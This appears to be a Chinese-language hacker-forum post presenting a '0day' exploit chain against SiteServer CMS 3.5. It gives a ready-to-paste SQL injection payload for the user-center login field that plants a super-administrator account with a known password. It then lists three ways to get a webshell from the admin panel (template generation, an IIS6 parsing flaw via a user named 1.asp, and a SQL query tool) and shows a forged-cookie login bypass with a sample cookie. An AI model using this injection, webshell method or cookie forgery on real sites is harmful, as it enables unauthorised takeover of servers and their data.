SiteServer CMS 0Day

经测试秒杀最新的3.5版

EXP:

直接访问UserCenter/login.aspx

用户名处输入：

123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles
values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。

之后再访问后台SiteServer/login.aspx用插入的用户登陆

后台拿webshell的三种方法：

一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、

成员权限-》添加用户-》用户名为：1.asp
http://127.0.0.1/usercenter/
用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）

三、

系统工具-》实用工具-》机器参数查看

可以看到数据库类型、名称，WEB路径

系统工具-》数据库工具-》SQL语句查询

这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

另外：siteserver还拥有cookies欺骗等漏洞

egg:BAIRONG.VC.ADMINLOGIN=6887; SITESERVER.ADMINISTRATOR.AUTH=0F7B10036E9FF94D33C4BE742E7D281E1BE923AEBB391E74FDB29EBCD0562DA027A340852E7CCAAAEAD4CA1EC30DF07E90A2CE42E5D862C84E1B06694F0C7A09788B7EE26000E7CBD14DE6AAE8E540BE403328B18792B24315DE96818A63D90CF8160F2DBCF97883216714E8AC81D63D0933DCBE;
SITESERVER.ADMINISTRATOR.USERNAME=admin; lzstat_uv=28995594273945333853|677603;

然后测试 发现只要USERNAME=admin 目标站点里确实有管理员admin 就可进行cookis欺骗登入

SQL:http://www.wooyun.org/whitehats/%E5%B0%8F%E6%96%B0